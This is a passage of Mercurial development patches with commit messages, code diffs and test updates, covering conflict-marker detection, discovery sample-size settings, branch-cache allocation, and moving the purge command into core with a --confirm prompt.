detected as conflicts, which affects both `commands.resolve.mark-check` and `mergetools.<tool>.check`. This patch fixes that. The new regex it uses for finding conflict markers is less restrictive because it `:mergediff` doesn't follow the `<<<<<<<` and `>>>>>>>` lines by a space (and a description). Hopefully lines like that don't give too many false positives. We can add back the space and make `:mergediff` add trailing spaces if it turns out to be a problem. OTOH, there will always be some false positives and we have ways of overriding the checks already. This patch can go onto the default or stable branch, depending on how much we care about an experimental feature. Differential Revision: https://phab.mercurial-scm.org/D9835 diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1195,7 +1195,11 @@ def hasconflictmarkers(data): return bool( - re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE) + re.search( + br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$", + data, + re.MULTILINE, + ) ) diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -344,6 +344,24 @@ $ hg resolve -l R file1 R file2 +Test with :mergediff conflict markers + $ hg resolve --unmark + $ hg resolve --re-merge -t :mergediff file2 + merging file2 + warning: conflicts while merging file2! 
(edit, then use 'hg resolve --mark') + [1] + $ hg resolve -l + U file1 + U file2 + $ hg --config commands.resolve.mark-check=abort resolve -m + warning: the following files still have conflict markers: + file2 + abort: conflict markers detected + (use --all to mark anyway) + [20] + $ hg resolve -l + U file1 + U file2 Test option value 'warn' $ hg resolve --unmark $ hg resolve -l # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611011919 -3600 # Tue Jan 19 00:18:39 2021 +0100 # Node ID 72f5280e33b6c3ec621ca33e2ac3de982e20a00a # Parent 0c95b59a89f17aabb202e1f1502b311f6b854d3b commit: look-up new revision once Look-up by node is slightly more expensive, so since it is necessary more than once, do it explicitly. Differential Revision: https://phab.mercurial-scm.org/D9830 diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -96,6 +96,7 @@ ctx.date(), extra, ) + rev = repo[n].rev() xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', @@ -108,7 +109,7 @@ targetphase = subrepoutil.newcommitphase(repo.ui, ctx) # prevent unmarking changesets as public on recommit - waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase() + waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase() if targetphase and not waspublic: # retract boundary do not alter parent changeset. 
@@ -116,7 +117,7 @@ # be compliant anyway # # if minimal phase was 0 we don't need to retract anything - phases.registernew(repo, tr, targetphase, [repo[n].rev()]) + phases.registernew(repo, tr, targetphase, [rev]) return n # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611012042 -3600 # Tue Jan 19 00:20:42 2021 +0100 # Node ID 009130064813065868050fadf40b2575ad815be2 # Parent 72f5280e33b6c3ec621ca33e2ac3de982e20a00a exchangev2: avoid second look-up by node Accessing the revlog by node is slightly more expensive than by revision, so look up the revision first and use it afterwards. Differential Revision: https://phab.mercurial-scm.org/D9831 diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -364,12 +364,13 @@ def onchangeset(cl, node): progress.increment() - revision = cl.changelogrevision(node) + rev = cl.rev(node) + revision = cl.changelogrevision(rev) added.append(node) # We need to preserve the mapping of changelog revision to node # so we can set the linkrev accordingly when manifests are added. - manifestnodes[cl.rev(node)] = revision.manifest + manifestnodes[rev] = revision.manifest nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610922093 -3600 # Sun Jan 17 23:21:33 2021 +0100 # Node ID 0600e8467101567d8007ad7e64d71d3cb7d26baa # Parent 009130064813065868050fadf40b2575ad815be2 discovery: add config options to control sample size This get useful for running analysis of the current algorithm. 
Differential Revision: https://phab.mercurial-scm.org/D9813 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -729,6 +729,18 @@ b'discovery.randomize', default=True, ) +# Control the initial size of the discovery sample +coreconfigitem( + b'devel', + b'discovery.sample-size', + default=200, +) +# Control the initial size of the discovery for initial change +coreconfigitem( + b'devel', + b'discovery.sample-size.initial', + default=100, +) _registerdiffopts(section=b'diff') coreconfigitem( b'email', diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -286,8 +286,6 @@ ui, local, remote, - initialsamplesize=100, - fullsamplesize=200, abortwhenunrelated=True, ancestorsof=None, audit=None, @@ -315,7 +313,8 @@ ownheads = [rev for rev in cl.headrevs() if rev != nullrev] initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads') - + initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial') + fullsamplesize = ui.configint(b'devel', b'discovery.sample-size') # We also ask remote about all the local heads. That set can be arbitrarily # large, so we used to limit it size to `initialsamplesize`. We no longer # do as it proved counter productive. 
The skipped heads could lead to a diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1328,25 +1328,25 @@ updating to branch b 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false + $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50 comparing with b query 1; heads searching for changes taking quick initial sample searching: 2 queries - query 2; still undecided: 1080, sample size is: 100 + query 2; still undecided: 1080, sample size is: 50 sampling from both directions searching: 3 queries - query 3; still undecided: 980, sample size is: 200 + query 3; still undecided: 1030, sample size is: 200 sampling from both directions searching: 4 queries - query 4; still undecided: 497, sample size is: 210 + query 4; still undecided: 547, sample size is: 210 sampling from both directions searching: 5 queries - query 5; still undecided: 285, sample size is: 220 + query 5; still undecided: 336, sample size is: 220 sampling from both directions searching: 6 queries - query 6; still undecided: 63, sample size is: 63 + query 6; still undecided: 114, sample size is: 114 6 total queries in *.????s (glob) elapsed time: * seconds (glob) round-trips: 6 @@ -1412,22 +1412,30 @@ missing: 1040 common heads: 3ee37d65064a - $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01 + $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config devel.discovery.sample-size=50 comparing with b searching for changes sampling from both directions - 
query 1; still undecided: 1340, sample size is: 200 + query 1; still undecided: 1340, sample size is: 50 + sampling from both directions + query 2; still undecided: 995, sample size is: 60 sampling from both directions - query 2; still undecided: 795, sample size is: 202 + query 3; still undecided: 913, sample size is: 72 sampling from both directions - query 3; still undecided: 525, sample size is: 204 + query 4; still undecided: 816, sample size is: 204 + sampling from both directions + query 5; still undecided: 612, sample size is: 153 sampling from both directions - query 4; still undecided: 252, sample size is: 206 + query 6; still undecided: 456, sample size is: 123 + sampling from both directions + query 7; still undecided: 332, sample size is: 147 sampling from both directions - query 5; still undecided: 44, sample size is: 44 - 5 total queries in *s (glob) - elapsed time: * seconds (glob) - round-trips: 5 + query 8; still undecided: 184, sample size is: 176 + sampling from both directions + query 9; still undecided: 8, sample size is: 8 + 9 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 9 heads summary: total common heads: 1 also local heads: 0 # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610670047 -3600 # Fri Jan 15 01:20:47 2021 +0100 # Node ID 1726a53a84942fca15a7edab4cb1eb8389908c5c # Parent 0600e8467101567d8007ad7e64d71d3cb7d26baa reverse-branch-cache: switch to doubling allocating scheme In preperation for updating the reverse-branch-cache incrementally whenever a new changeset comes in, avoid bad performance on resize with Python 3.7 (and likely other 3.x versions). 
Differential Revision: https://phab.mercurial-scm.org/D9778 diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -566,6 +566,7 @@ # [4 byte hash prefix][4 byte branch name number with sign bit indicating open] _rbcrecfmt = b'>4sI' _rbcrecsize = calcsize(_rbcrecfmt) +_rbcmininc = 64 * _rbcrecsize _rbcnodelen = 4 _rbcbranchidxmask = 0x7FFFFFFF _rbccloseflag = 0x80000000 @@ -730,11 +731,15 @@ if rev == nullrev: return rbcrevidx = rev * _rbcrecsize - if len(self._rbcrevs) < rbcrevidx + _rbcrecsize: - self._rbcrevs.extend( - b'\0' - * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs)) - ) + requiredsize = rbcrevidx + _rbcrecsize + rbccur = len(self._rbcrevs) + if rbccur < requiredsize: + # bytearray doesn't allocate extra space at least in Python 3.7. + # When multiple changesets are added in a row, precise resize would + # result in quadratic complexity. Overallocate to compensate by + # use the classic doubling technique for dynamic arrays instead. + # If there was a gap in the map before, less space will be reserved. + self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize)) pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx) self._rbcrevslen = min(self._rbcrevslen, rev) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1589837393 14400 # Mon May 18 17:29:53 2020 -0400 # Node ID dfca84970da846f3849ee464546f90b637f50852 # Parent 1726a53a84942fca15a7edab4cb1eb8389908c5c cleanup: use mergestate.unresolvedcount() instead of bool(list(unresolved())) This avoids some pointless copying. 
Differential Revision: https://phab.mercurial-scm.org/D8566 diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -433,8 +433,9 @@ if not (len(revs) == 1 and wdirrev in revs): cmdutil.checkunfinished(repo) rewriteutil.precheck(repo, revs, b'fix') - if wdirrev in revs and list( - mergestatemod.mergestate.read(repo).unresolved() + if ( + wdirrev in revs + and mergestatemod.mergestate.read(repo).unresolvedcount() ): raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'") if not revs: diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -6082,7 +6082,7 @@ if hint: ui.warn(hint) - unresolvedf = list(ms.unresolved()) + unresolvedf = ms.unresolvedcount() if not unresolvedf: ui.status(_(b'(no more unresolved files)\n')) cmdutil.checkafterresolved(repo) diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1920,7 +1920,7 @@ if len(pl) > 1: raise error.Abort(_(b"outstanding uncommitted merge")) ms = wc.mergestate() - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -13,7 +13,7 @@ def checkunresolved(ms): - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.StateError( _(b"unresolved merge conflicts (see 'hg help resolve')") ) diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -812,7 +812,7 @@ with repo.lock(): checkparents(repo, state) ms = mergestatemod.mergestate.read(repo) - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"unresolved conflicts, can't continue"), hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"), # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1590701501 
14400 # Thu May 28 17:31:41 2020 -0400 # Node ID 24a32dea69557bdacfd650c7b586f8dd35860212 # Parent dfca84970da846f3849ee464546f90b637f50852 rebase: add a config knob for forcing in-memory rebasing Use it in a test case where we know the rebase should proceed without incident in-memory, so we can see tracebacks rather than fallbacks. This makes it easier to try and debug when things are broken. Differential Revision: https://phab.mercurial-scm.org/D8623 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -67,6 +67,14 @@ cmdtable = {} command = registrar.command(cmdtable) + +configtable = {} +configitem = registrar.configitem(configtable) +configitem( + b'devel', + b'rebase.force-in-memory-merge', + default=False, +) # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should # be specifying the version(s) of Mercurial they are tested with, or @@ -1112,6 +1120,8 @@ with ui.configoverride(overrides, b'rebase'): return _dorebase(ui, repo, action, opts, inmemory=inmemory) except error.InMemoryMergeConflictsError: + if ui.configbool(b'devel', b'rebase.force-in-memory-merge'): + raise ui.warn( _( b'hit merge conflicts; re-running rebase without in-memory' diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -345,7 +345,10 @@ $ hg co -q 0 $ hg mv a b $ hg ci -qm 'rename a to b' - $ hg rebase -d 1 --config rebase.experimental.inmemory=yes +Not only do we want this to run in-memory, it shouldn't fall back to +on-disk merge (no conflicts), so we force it to be in-memory +with no fallback. 
+ $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes rebasing 2:* tip "rename a to b" (glob) merging a and b to b saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1589237145 14400 # Mon May 11 18:45:45 2020 -0400 # Node ID 63dfaca9087f47b5991dcc702696940497b6eeb3 # Parent 24a32dea69557bdacfd650c7b586f8dd35860212 filemerge: add a hacktastic version of internal:merge3 for merge diffs This is a version of merge3 that always reports success, so that conflict markers get preserved without us having to implement conflict storage for in-memory merge. Credit to martinvonz for the idea. The only planned consumer of this "merge tool" is my upcoming merge-diffs functionality, though I suspect it could be useful in other ways. Differential Revision: https://phab.mercurial-scm.org/D8515 diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -538,6 +538,25 @@ @internaltool( + b'merge3-lie-about-conflicts', + fullmerge, + b'', + precheck=_mergecheck, +) +def _imerge3alwaysgood(*args, **kwargs): + # Like merge3, but record conflicts as resolved with markers in place. + # + # This is used for `hg diff --merge` to show the differences between + # the auto-merge state and the committed merge state. It may be + # useful for other things. + b1, junk, b2 = _imerge3(*args, **kwargs) + # TODO is this right? I'm not sure what these return values mean, + # but as far as I can tell this will indicate to callers tha the + # merge succeeded. 
+ return b1, False, b2 + + +@internaltool( b'mergediff', fullmerge, _( # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610961843 -3600 # Mon Jan 18 10:24:03 2021 +0100 # Node ID 135056e8b5a8c6261e16fbd040f99aefec08e3f9 # Parent 63dfaca9087f47b5991dcc702696940497b6eeb3 purge: add a --confirm option The options provide a prompt to the user before permanent deletion are made. The prompt is currently not aware of directory deletion. I'll fix this in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D9818 diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -61,6 +61,7 @@ b' (implies -p/--print)' ), ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), ] + cmdutil.walkopts, _(b'hg purge [OPTION]... [DIR]...'), @@ -113,6 +114,7 @@ removefiles = opts.get(b'files') removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') if not removefiles and not removedirs: removefiles = True @@ -129,6 +131,7 @@ removefiles=removefiles, abortonerror=opts.get(b'abort_on_err'), noop=not act, + confirm=confirm, ) for path in paths: diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -2324,6 +2324,7 @@ removefiles=True, abortonerror=False, noop=False, + confirm=False, ): """Purge the working directory of untracked files. @@ -2344,6 +2345,8 @@ ``noop`` controls whether to actually remove files. If not defined, actions will be taken. + ``confirm`` ask confirmation before actually removing anything. + Returns an iterable of relative paths in the working directory that were or would be removed. 
""" @@ -2371,6 +2374,25 @@ status = repo.status(match=matcher, ignored=ignored, unknown=unknown) + if confirm: + nb_ignored = len(status.ignored) + nb_unkown = len(status.unknown) + if nb_unkown and nb_ignored: + msg = _(b"permanently delete %d unkown and %d ignored files?") + msg %= (nb_unkown, nb_ignored) + elif nb_unkown: + msg = _(b"permanently delete %d unkown files?") + msg %= nb_unkown + elif nb_ignored: + msg = _(b"permanently delete %d ignored files?") + msg %= nb_ignored + else: + # XXX we might be missing directory there + return res + msg += b" (yN)$$ &Yes $$ &No" + if repo.ui.promptchoice(msg, default=1) == 1: + raise error.CanceledError(_(b'removal cancelled')) + if removefiles: for f in sorted(status.unknown + status.ignored): if not noop: diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -62,6 +62,10 @@ $ hg purge -p untracked_file untracked_file_readonly + $ hg purge --confirm + permanently delete 2 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing file untracked_file removing file untracked_file_readonly @@ -121,6 +125,10 @@ $ cd directory $ hg purge -p ../untracked_directory untracked_directory/nested_directory + $ hg purge --confirm + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v ../untracked_directory removing directory untracked_directory/nested_directory removing directory untracked_directory @@ -138,6 +146,7 @@ $ touch ignored $ hg purge -p + $ hg purge --confirm $ hg purge -v $ touch untracked_file $ ls @@ -147,6 +156,10 @@ untracked_file $ hg purge -p -i ignored + $ hg purge --confirm -i + permanently delete 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v -i removing file ignored $ ls -A @@ -159,6 +172,10 @@ $ hg purge -p --all ignored untracked_file + $ hg purge --confirm --all + permanently delete 1 unkown and 1 ignored files? 
(yN) n + abort: removal cancelled + [250] $ hg purge -v --all removing file ignored removing file untracked_file # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610961851 -3600 # Mon Jan 18 10:24:11 2021 +0100 # Node ID 57370e7deb7b4c9d470c542febbae30b3f40e1f7 # Parent 135056e8b5a8c6261e16fbd040f99aefec08e3f9 purge: also deal with directory with --confirm Getting the exact number is simple (you have to project the result of previous deletion to detect super-directory with only about-to-be-deleted content). So we use a vaguer message. Differential Revision: https://phab.mercurial-scm.org/D9819 diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -2386,9 +2386,19 @@ elif nb_ignored: msg = _(b"permanently delete %d ignored files?") msg %= nb_ignored - else: - # XXX we might be missing directory there - return res + elif removeemptydirs: + dir_count = 0 + for f in directories: + if matcher(f) and not repo.wvfs.listdir(f): + dir_count += 1 + if dir_count: + msg = _( + b"permanently delete at least %d empty directories?" + ) + msg %= dir_count + else: + # XXX we might be missing directory there + return res msg += b" (yN)$$ &Yes $$ &No" if repo.ui.promptchoice(msg, default=1) == 1: raise error.CanceledError(_(b'removal cancelled')) diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -23,6 +23,10 @@ $ mkdir empty_dir $ hg purge -p -v empty_dir + $ hg purge --confirm + permanently delete at least 1 empty directories? 
(yN) n + abort: removal cancelled + [250] $ hg purge -v removing directory empty_dir $ ls -A # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1610961860 -3600 # Mon Jan 18 10:24:20 2021 +0100 # Node ID bb3a5c0df06b2cb1bc3a01b850d69113d9818f5f # Parent 57370e7deb7b4c9d470c542febbae30b3f40e1f7 purge: move extension into core mercurial The motivation is simple: it's nicer to avoid gating basic functionality. To reduce the risk of people shooting themselves in the feet, `--confirm` is now the default, unless the extensions is loaded.. For review of the body of the purge command, use this instead of what hg/phabricator will show (the block of code is modified, not just moved): Differential Revision: https://phab.mercurial-scm.org/D9820 diff --git a/hgext/largefiles/overrides.py b/hgext/largefiles/overrides.py --- a/hgext/largefiles/overrides.py +++ b/hgext/largefiles/overrides.py @@ -1567,7 +1567,7 @@ # Calling purge with --all will cause the largefiles to be deleted. # Override repo.status to prevent this from happening. -@eh.wrapcommand(b'purge', extension=b'purge') +@eh.wrapcommand(b'purge') def overridepurge(orig, ui, repo, *dirs, **opts): # XXX Monkey patching a repoview will not work. The assigned attribute will # be set on the unfiltered repo, but we will only lookup attributes in the diff --git a/hgext/purge.py b/hgext/purge.py --- a/hgext/purge.py +++ b/hgext/purge.py @@ -22,118 +22,11 @@ # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. 
-'''command to delete untracked files from the working directory''' -from __future__ import absolute_import - -from mercurial.i18n import _ -from mercurial import ( - cmdutil, - merge as mergemod, - pycompat, - registrar, - scmutil, -) - -cmdtable = {} -command = registrar.command(cmdtable) -# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for -# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should -# be specifying the version(s) of Mercurial they are tested with, or -# leave the attribute unspecified. -testedwith = b'ships-with-hg-core' - - -@command( - b'purge|clean', - [ - (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), - (b'', b'all', None, _(b'purge ignored files too')), - (b'i', b'ignored', None, _(b'purge only ignored files')), - (b'', b'dirs', None, _(b'purge empty directories')), - (b'', b'files', None, _(b'purge files')), - (b'p', b'print', None, _(b'print filenames instead of deleting them')), - ( - b'0', - b'print0', - None, - _( - b'end filenames with NUL, for use with xargs' - b' (implies -p/--print)' - ), - ), - (b'', b'confirm', None, _(b'ask before permanently deleting files')), - ] - + cmdutil.walkopts, - _(b'hg purge [OPTION]... [DIR]...'), - helpcategory=command.CATEGORY_WORKING_DIRECTORY, -) -def purge(ui, repo, *dirs, **opts): - """removes files not tracked by Mercurial - - Delete files not known to Mercurial. This is useful to test local - and uncommitted changes in an otherwise-clean source tree. - - This means that purge will delete the following by default: - - - Unknown files: files marked with "?" 
by :hg:`status` - - Empty directories: in fact Mercurial ignores directories unless - they contain files under source control management +'''command to delete untracked files from the working directory (DEPRECATED) - But it will leave untouched: - - - Modified and unmodified tracked files - - Ignored files (unless -i or --all is specified) - - New files added to the repository (with :hg:`add`) - - The --files and --dirs options can be used to direct purge to delete - only files, only directories, or both. If neither option is given, - both will be deleted. - - If directories are given on the command line, only files in these - directories are considered. - - Be careful with purge, as you could irreversibly delete some files - you forgot to add to the repository. If you only want to print the - list of files that this program would delete, use the --print - option. - """ - opts = pycompat.byteskwargs(opts) - cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') +The functionality of this extension has been included in core Mercurial since +version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now the default, unless the extension is enabled for backward compatibility. 
+''' - act = not opts.get(b'print') - eol = b'\n' - if opts.get(b'print0'): - eol = b'\0' - act = False # --print0 implies --print - if opts.get(b'all', False): - ignored = True - unknown = True - else: - ignored = opts.get(b'ignored', False) - unknown = not ignored - - removefiles = opts.get(b'files') - removedirs = opts.get(b'dirs') - confirm = opts.get(b'confirm') - - if not removefiles and not removedirs: - removefiles = True - removedirs = True - - match = scmutil.match(repo[None], dirs, opts) - - paths = mergemod.purge( - repo, - match, - unknown=unknown, - ignored=ignored, - removeemptydirs=removedirs, - removefiles=removefiles, - abortonerror=opts.get(b'abort_on_err'), - noop=not act, - confirm=confirm, - ) - - for path in paths: - if not act: - ui.write(b'%s%s' % (path, eol)) +# This empty extension looks pointless, but core mercurial checks if it's loaded +# to implement the slightly different behavior documented above. diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5447,6 +5447,108 @@ @command( + b'purge|clean', + [ + (b'a', b'abort-on-err', None, _(b'abort if an error occurs')), + (b'', b'all', None, _(b'purge ignored files too')), + (b'i', b'ignored', None, _(b'purge only ignored files')), + (b'', b'dirs', None, _(b'purge empty directories')), + (b'', b'files', None, _(b'purge files')), + (b'p', b'print', None, _(b'print filenames instead of deleting them')), + ( + b'0', + b'print0', + None, + _( + b'end filenames with NUL, for use with xargs' + b' (implies -p/--print)' + ), + ), + (b'', b'confirm', None, _(b'ask before permanently deleting files')), + ] + + cmdutil.walkopts, + _(b'hg purge [OPTION]... [DIR]...'), + helpcategory=command.CATEGORY_WORKING_DIRECTORY, +) +def purge(ui, repo, *dirs, **opts): + """removes files not tracked by Mercurial + + Delete files not known to Mercurial. This is useful to test local + and uncommitted changes in an otherwise-clean source tree. 
+ + This means that purge will delete the following by default: + + - Unknown files: files marked with "?" by :hg:`status` + - Empty directories: in fact Mercurial ignores directories unless + they contain files under source control management + + But it will leave untouched: + + - Modified and unmodified tracked files + - Ignored files (unless -i or --all is specified) + - New files added to the repository (with :hg:`add`) + + The --files and --dirs options can be used to direct purge to delete + only files, only directories, or both. If neither option is given, + both will be deleted. + + If directories are given on the command line, only files in these + directories are considered. + + Be careful with purge, as you could irreversibly delete some files + you forgot to add to the repository. If you only want to print the + list of files that this program would delete, use the --print + option. + """ + opts = pycompat.byteskwargs(opts) + cmdutil.check_at_most_one_arg(opts, b'all', b'ignored') + + act = not opts.get(b'print') + eol = b'\n' + if opts.get(b'print0'): + eol = b'\0' + act = False # --print0 implies --print + if opts.get(b'all', False): + ignored = True + unknown = True + else: + ignored = opts.get(b'ignored', False) + unknown = not ignored + + removefiles = opts.get(b'files') + removedirs = opts.get(b'dirs') + confirm = opts.get(b'confirm') + if confirm is None: + try: + extensions.find(b'purge') + confirm = False + except KeyError: + confirm = True + + if not removefiles and not removedirs: + removefiles = True + removedirs = True + + match = scmutil.match(repo[None], dirs, opts) + + paths = mergemod.purge( + repo, + match, + unknown=unknown, + ignored=ignored, + removeemptydirs=removedirs, + removefiles=removefiles, + abortonerror=opts.get(b'abort_on_err'), + noop=not act, + confirm=confirm, + ) + + for path in paths: + if not act: + ui.write(b'%s%s' % (path, eol)) + + +@command( b'push', [ (b'f', b'force', None, _(b'force push')), diff --git 
a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -17,6 +17,8 @@ can be e.g. `rebase`. As part of this effort, the default format from `hg rebase` was reorganized a bit. + * `hg purge` is now a core command using `--confirm` by default. + * `hg strip`, from the strip extension, is now a core command, `hg debugstrip`. The extension remains for compatibility. diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -38,6 +38,7 @@ paths phase pull + purge push recover remove @@ -354,6 +355,7 @@ paths: template phase: public, draft, secret, force, rev pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure + purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -351,6 +351,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -483,6 +484,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help-hide.t b/tests/test-help-hide.t --- a/tests/test-help-hide.t +++ b/tests/test-help-hide.t @@ -55,6 +55,7 @@ addremove add all new 
files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -191,6 +192,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -107,6 +107,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -235,6 +236,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -375,8 +377,6 @@ mq manage a stack of patches notify hooks for sending email push notifications patchbomb command to send changesets as (a series of) patch emails - purge command to delete untracked files from the working - directory relink recreates hardlinks between repository clones schemes extend schemes with shortcuts to repository swarms share share a common history between several working directories @@ -2720,6 +2720,13 @@ set or show the current phase name </td></tr> <tr><td> + <a 
